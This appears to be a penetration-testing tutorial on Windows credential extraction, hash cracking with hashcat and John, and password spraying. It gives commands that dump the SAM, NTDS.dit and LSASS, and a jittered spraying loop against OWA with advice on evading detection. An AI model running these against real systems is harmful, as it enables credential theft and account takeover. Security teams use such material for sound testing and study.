Password Security Assessment and Credential Testing

Windows Credential Architecture and Hash Extraction

Understanding Windows credential storage is fundamental to effective password security assessment. The Local Security Authority Subsystem Service (LSASS) caches authentication credentials in memory, including NT hashes, Kerberos tickets, and, on systems where WDigest credential caching is enabled (the default before Windows 8.1 and Server 2012 R2), cleartext passwords. These cached credentials support single sign-on and network authentication, which makes LSASS memory dumps extraordinarily valuable to penetration testers.

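The Security Accounts Manager (SAM) database stores local account hashes, encrypted with a boot key derived from the SYSTEM registry hive. From an elevated prompt, the reg save command exports the hives for offline analysis; the SECURITY hive additionally holds LSA secrets and cached domain logons: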

reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
reg save HKLM\SECURITY security.save

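For Active Directory environments, the NTDS.dit file contains the entire directory database, including every domain account's current hash and password history. The hashes are protected by the PEK (Password Encryption Key), which is stored inside NTDS.dit itself but encrypted with the boot key from the SYSTEM hive, so both files are needed for offline decryption. The database is held open on a running domain controller, so it has to be copied from a snapshot, for example one created with the Volume Shadow Copy Service (VSS):

vssadmin create shadow /for=C:
rem Substitute the "Shadow Copy Volume Name" reported above; wildcards are not expanded in device paths
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit
reg save HKLM\SYSTEM C:\temp\system.save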

Memory dumps capture credentials in active use. Tools like pypykatz (a Python implementation of Mimikatz) parse LSASS dumps without requiring Windows execution:

# Extracting hashes from a Windows 10 VM memory dump
pypykatz lsa minidump /var/captures/win10vm.dmp

# Illustrative result, written as an LM:NT pair (hashcat mode 1000 takes the NT half):
# Username: jsmith
# LM:NT: aad3b435b51404eeaad3b435b51404ee:64F12CDDAA88057E06A81B54E73B949B

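The pair follows the classic LM:NT layout. The LM half, aad3b435b51404eeaad3b435b51404ee, is the well-known placeholder for an empty LM hash, meaning no LM hash is stored: either LM hashing is disabled (the default since Windows Vista and Server 2008) or the password is longer than 14 characters. The NT half is the MD4 digest of the UTF-16LE encoded password.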
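
The MD4-over-UTF-16LE construction can be reproduced in a few lines. The sketch below is illustrative only: it carries its own compact MD4 (following RFC 1320) because many current OpenSSL builds no longer expose MD4 through hashlib, and the names md4, nt_hash, lm_is_blank, and EMPTY_LM are chosen here for illustration rather than taken from any tool mentioned above.

```python
import struct

MASK = 0xFFFFFFFF
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # placeholder meaning "no LM hash stored"


def _rotl(x: int, n: int) -> int:
    """Rotate a 32-bit value left by n bits."""
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """Compact MD4 per RFC 1320 (illustrative, not optimized)."""
    # Padding: 0x80, zeros up to 56 mod 64, then the bit length (64-bit little-endian).
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg)) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)

    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    round3_order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)

    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for i in range(16):  # round 1: selection function, words in natural order
            f = (b & c) | (~b & d)
            a = _rotl((a + f + x[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2: majority function, column-wise word order
            g = (b & c) | (b & d) | (c & d)
            k = (i % 4) * 4 + i // 4
            a = _rotl((a + g + x[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3: parity function
            h = b ^ c ^ d
            k = round3_order[i]
            a = _rotl((a + h + x[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]

    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash: MD4 over the UTF-16LE encoding of the password, as lowercase hex."""
    return md4(password.encode("utf-16-le")).hex()


def lm_is_blank(pair: str) -> bool:
    """True when the LM half of an LM:NT pair is the empty-LM placeholder."""
    lm, _, _nt = pair.partition(":")
    return lm.lower() == EMPTY_LM


if __name__ == "__main__":
    print(nt_hash("password"))
    print(lm_is_blank("aad3b435b51404eeaad3b435b51404ee:64F12CDDAA88057E06A81B54E73B949B"))
```

Two widely published reference values are useful for checking any such implementation: the NT hash of an empty password is 31d6cfe0d16ae931b73c59d7e0c089c0, and the NT hash of "password" is 8846f7eaee8fb117ad06bdd830b7586c. Because the construction has no salt, identical passwords always produce identical hashes across accounts and domains.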

Hashcat: Rule-Based and Mask-Based Optimization

Hashcat's performance depends heavily on attack optimization, and benchmarks guide hardware allocation. Run hashcat -b -m 1000 to measure NTLM speed in H/s (hashes per second). Treat the figure as an upper bound: the benchmark runs a brute-force attack against a single hash with optimized kernels, and real wordlist-and-rule attacks are usually slower because candidates must be fed to the GPU and some can be rejected before hashing.

Workload profiles (-w 1 through -w 4) trade desktop responsiveness for throughput: -w 1 keeps the desktop usable, -w 2 is the default, -w 3 suits dedicated cracking workstations where an unresponsive display is acceptable, and -w 4 is intended for headless systems. The --backend-devices (-d) flag restricts a run to specific GPUs in multi-card setups.

Rules transform a base wordlist through systematic modifications. The distinction between rule sets matters enormously:

Rule Set	Purpose	Example Transformation
`best64.rule`	Ships with hashcat; small set with broad coverage	`$1$2$3` appends "123"
`dive.rule`	Ships with hashcat; very large set of deep mutations	Many chained functions per rule
`OneRuleToRuleThemAll.rule`	Community-curated hybrid of several rule sets	Case, leetspeak, and append/prepend combinations

Masks target known patterns when the password structure is partially understood. Mask syntax uses placeholders: ?l (lowercase), ?u (uppercase), ?d (digit), ?s (special). For a password shaped like Acmecorp2024!, that is, a capitalized eight-letter word followed by a four-digit year and a symbol:

hashcat -m 1000 -a 3 -w 3 -O hashes.txt ?u?l?l?l?l?l?l?l?d?d?d?d?s

This specifies one uppercase letter, seven lowercase letters, four digits, and one special character. No custom charset is needed because ?u is built in; an option such as -1 only has an effect when the mask references ?1. The -O flag selects optimized kernels, which are considerably faster but cap the maximum password length (the exact limit depends on the hash mode), a limit this 13-character mask stays well under.
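
Before launching a mask attack it helps to know how large the mask's keyspace is. The sketch below multiplies the sizes of hashcat's built-in charsets for a mask of one uppercase letter, seven lowercase letters, four digits, and one special character. The function names and the 50 GH/s rate are assumptions made for illustration; a real rate should come from a benchmark on the actual hardware.

```python
# Sizes of hashcat's built-in charsets: ?l and ?u hold 26 characters each,
# ?d holds 10, ?s holds 33 (space plus 32 punctuation marks), ?a is their union.
CHARSET_SIZES = {"l": 26, "u": 26, "d": 10, "s": 33, "a": 95}


def mask_keyspace(mask: str) -> int:
    """Count the candidates a mask generates (built-in placeholders and literals only)."""
    total = 1
    i = 0
    while i < len(mask):
        if mask[i] == "?":
            if i + 1 >= len(mask):
                raise ValueError("dangling '?' at end of mask")
            key = mask[i + 1]
            if key == "?":
                pass  # "??" is a literal question mark: one possibility
            elif key in CHARSET_SIZES:
                total *= CHARSET_SIZES[key]
            else:
                raise ValueError(f"unsupported placeholder ?{key}")
            i += 2
        else:
            i += 1  # a literal character contributes a factor of 1
    return total


def days_to_exhaust(mask: str, hashes_per_second: float) -> float:
    """Worst-case time to try every candidate at a fixed rate, in days."""
    return mask_keyspace(mask) / hashes_per_second / 86400


if __name__ == "__main__":
    mask = "?u?l?l?l?l?l?l?l?d?d?d?d?s"
    assumed_rate = 50e9  # hypothetical 50 GH/s; measure with hashcat -b instead
    print(f"{mask_keyspace(mask):,} candidates")
    print(f"{days_to_exhaust(mask, assumed_rate):.1f} days at the assumed rate")
```

The mask works out to 26^8 x 10^4 x 33, roughly 6.9 x 10^16 candidates, or about 16 days at the assumed rate. Fixing the year to a literal 2024 in the mask removes the factor of 10^4, which is why narrowing even one segment of the structure pays off so quickly.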

When the company name is known but its capitalization or spelling varies, a wordlist with rules is a better fit than a mask:

hashcat -m 1000 -a 0 hashes.txt wordlist.txt -r rules/custom_company.rule -w 3

A custom rule file might contain:

c $2 $0 $2 $4 $!
so0 si1 $2 $0 $2 $4 $!

The first line capitalizes the word and appends "2024!"; the second substitutes 'o'→'0', 'i'→'1' before appending.
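
To make the rule semantics concrete, the following sketch interprets just the three rule functions used above: c (capitalize), sXY (replace every X with Y), and $X (append X). It is a teaching aid rather than a reimplementation of hashcat's rule engine; apply_rule is a hypothetical helper, and splitting on whitespace means it cannot express rules that append a space.

```python
def apply_rule(rule: str, word: str) -> str:
    """Apply one space-separated rule line to a word, function by function."""
    for func in rule.split():
        if func == "c":
            # Capitalize: first character upper, the rest lower.
            word = word[:1].upper() + word[1:].lower()
        elif func[0] == "s" and len(func) == 3:
            # sXY: replace every occurrence of X with Y.
            word = word.replace(func[1], func[2])
        elif func[0] == "$" and len(func) == 2:
            # $X: append the single character X.
            word += func[1]
        else:
            raise ValueError(f"unsupported rule function: {func!r}")
    return word


if __name__ == "__main__":
    rules = ["c $2 $0 $2 $4 $!", "so0 si1 $2 $0 $2 $4 $!"]
    for base in ("contoso", "initech"):  # placeholder company names
        for rule in rules:
            print(f"{base!r} + {rule!r} -> {apply_rule(rule, base)!r}")
```

With the placeholder word contoso, the first rule yields Contoso2024! and the second yields c0nt0s02024!. Because functions run left to right, a substitution placed after the appended digits would also rewrite those digits, so ordering within a rule line matters.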

John the Ripper Community-Enhanced Features

John the Ripper's Jumbo edition extends the core with many additional hash formats and cracking modes. Its --loopback flag reuses already-cracked passwords from the pot file as a wordlist, exploiting password reuse patterns. The --prince mode implements the PRINCE algorithm (PRobability INfinite Chained Elements), which builds candidates by chaining one or more words from a single wordlist rather than enumerating a character keyspace exhaustively.

For Windows hashes, John's NT format handles NT (NTLM) hashes, while mscash2 covers cached domain credentials (DCC2). The --show option lists already-cracked hashes without reprocessing:

john --format=nt --show hashes.txt
# then loopback for deeper patterns:
john --format=nt --loopback hashes.txt

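Related community tooling includes statsgen and maskgen from PACK (the Password Analysis and Cracking Kit), which analyze leaked or previously cracked passwords and generate masks ranked by how often each structure actually occurs, a better starting point than generic assumptions.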
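
The idea behind corpus-driven mask generation can be sketched briefly: convert each known password to its structural mask and count how often each mask occurs. This is a simplified illustration of the approach, not the actual statsgen or maskgen code; to_mask and rank_masks are hypothetical names, and mapping every non-ASCII character to a single ?b is a simplification.

```python
import string
from collections import Counter


def to_mask(password: str) -> str:
    """Map each character to the hashcat placeholder for its class."""
    parts = []
    for ch in password:
        if ch in string.ascii_lowercase:
            parts.append("?l")
        elif ch in string.ascii_uppercase:
            parts.append("?u")
        elif ch in string.digits:
            parts.append("?d")
        elif ch in string.punctuation or ch == " ":
            parts.append("?s")
        else:
            parts.append("?b")  # simplification: anything outside printable ASCII
    return "".join(parts)


def rank_masks(passwords):
    """Return (mask, count) pairs, most frequent structure first."""
    return Counter(to_mask(p) for p in passwords).most_common()


if __name__ == "__main__":
    # Made-up sample standing in for a corpus of previously cracked passwords.
    sample = ["Summer2024!", "Winter2023!", "Qwerty123!", "letmein1"]
    for mask, count in rank_masks(sample):
        print(f"{count:>3}  {mask}")
```

Running the highest-ranked masks first concentrates cracking time on the structures users actually choose, which is the same prioritization maskgen automates at scale.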

Password Policy Analysis and Statistical Weaknesses

Effective assessment examines policy enforcement gaps. Tools like cracklib-check and lpcp (Local Password Complexity Policy) reveal whether technical controls match documented policy. Statistical analysis of cracked passwords exposes systemic weaknesses: seasonal patterns (Summer2024!), keyboard walks (Qwerty123!), and organization-specific terms such as the company name, office locations, or product names.
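
A simple tally is often enough to show how much of a cracked set falls into these predictable families. The sketch below is a minimal example under stated assumptions: the regular expression, the list of keyboard walks, and the category names are illustrative choices, and a real engagement would extend them with organization-specific terms.

```python
import re
from collections import Counter

# Season name followed by a two- or four-digit year and optional trailing symbols.
SEASON_YEAR = re.compile(
    r"^(spring|summer|autumn|fall|winter)(\d{2}|\d{4})\W*$", re.IGNORECASE
)
# A few common keyboard walks; deliberately short, extend as needed.
KEYBOARD_WALKS = ("qwerty", "asdfgh", "zxcvbn", "1qaz2wsx", "qazwsx")


def classify(password: str) -> str:
    """Assign a password to the first matching pattern family."""
    if SEASON_YEAR.match(password):
        return "season_year"
    lowered = password.lower()
    if any(walk in lowered for walk in KEYBOARD_WALKS):
        return "keyboard_walk"
    return "other"


def tally(passwords):
    """Count passwords per pattern family."""
    return Counter(classify(p) for p in passwords)


if __name__ == "__main__":
    cracked = ["Summer2024!", "Qwerty123!", "Winter2024!", "xK9#mP2$vL"]  # made-up sample
    for family, count in tally(cracked).most_common():
        print(f"{family:<14} {count}")
```

Reporting the share of each family, rather than individual passwords, keeps the findings actionable for policy owners without exposing any user's credential.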

Estimate password entropy from observed samples rather than from the policy's theoretical keyspace. A policy requiring 12 characters with complexity often yields predictable constructions (P@ssw0rd1234) whose effective entropy can fall below 30 bits despite surface complexity.
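
The gap between nominal and effective entropy is easy to quantify. The sketch below compares a 12-character password drawn uniformly from 95 printable ASCII characters with a password built from a pattern. The pattern's component counts (10,000 base words, 8 substitution variants, 10,000 four-digit suffixes) are assumptions chosen for illustration, not measured values.

```python
import math


def charset_entropy_bits(length: int, charset_size: int) -> float:
    """Entropy of a password chosen uniformly at random from a charset."""
    return length * math.log2(charset_size)


def pattern_entropy_bits(*choices: int) -> float:
    """Entropy of a password built from independent choices, each uniform
    over the given number of options."""
    return sum(math.log2(n) for n in choices)


if __name__ == "__main__":
    nominal = charset_entropy_bits(12, 95)
    # Assumed attacker model: dictionary word, leetspeak variant, 4-digit suffix.
    effective = pattern_entropy_bits(10_000, 8, 10_000)
    print(f"nominal:   {nominal:.1f} bits")
    print(f"effective: {effective:.1f} bits")
```

Under these assumptions the nominal figure is about 78.8 bits while the pattern-based figure is about 29.6 bits, a difference of roughly 49 bits, meaning an attacker who models the pattern faces a search space smaller by a factor of around 2^49.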

Enterprise Password Spraying and Credential Stuffing

Password spraying inverts the brute-force approach: few passwords against many accounts, evading individual lockout thresholds. Success depends on reconnaissance and timing discipline.

Reconnaissance: Enumerate authentication endpoints—OWA, VPN portals, federated SAML/WS-Federation points. Federation considerations are critical: Azure AD may enforce different lockout policies than on-premises AD, and pass-through authentication agents can yield inconsistent results across endpoints.

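Lockout threshold analysis: Establish the lockout threshold (lockoutThreshold) and observation window (lockOutObservationWindow) before testing. The net accounts /domain command reports the default domain policy, but fine-grained password policies can override it for specific groups, so the per-account badPwdCount counter is a more reliable indicator of how close each account is to lockout. Attempts are then spaced so that the counter resets between them: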

# Spray with 30-minute intervals exceeding typical 30-minute windows
for user in $(cat users.txt); do
    python3 ntlm_passwordspray.py -u "$user" -p "Winter2024!" -t https://mail.target.com/owa/
    sleep $((1800 + RANDOM % 600))  # 30-40 minute jitter
done

Detection evasion through timing jitter: Uniform intervals trigger behavioral analytics. Implement variable delays with Gaussian or exponential distributions. Some tools randomize User-Agent strings and source IPs across proxy pools.

Credential stuffing leverages breached databases. Tools like CredMaster with FireProx integration rotate AWS API Gateway endpoints, presenting unique source IPs per request and defeating IP-based rate limiting. The --jitter 120 flag introduces random delays between authentication attempts.

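Defensive awareness includes understanding smart lockout in Azure AD (now Microsoft Entra ID), which treats sign-ins from familiar and unfamiliar locations separately, and recognizing where cloud and on-premises policies diverge. Smart lockout applies to cloud-evaluated sign-ins such as password hash synchronization and pass-through authentication. When authentication is federated to AD FS, sign-ins are evaluated on-premises, so protection depends on AD FS extranet lockout and the on-premises policy, which may be less restrictive.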

The intersection of technical extraction, optimized cracking, and human behavioral patterns makes password assessment uniquely challenging—requiring both computational resources and psychological insight into organizational password construction habits.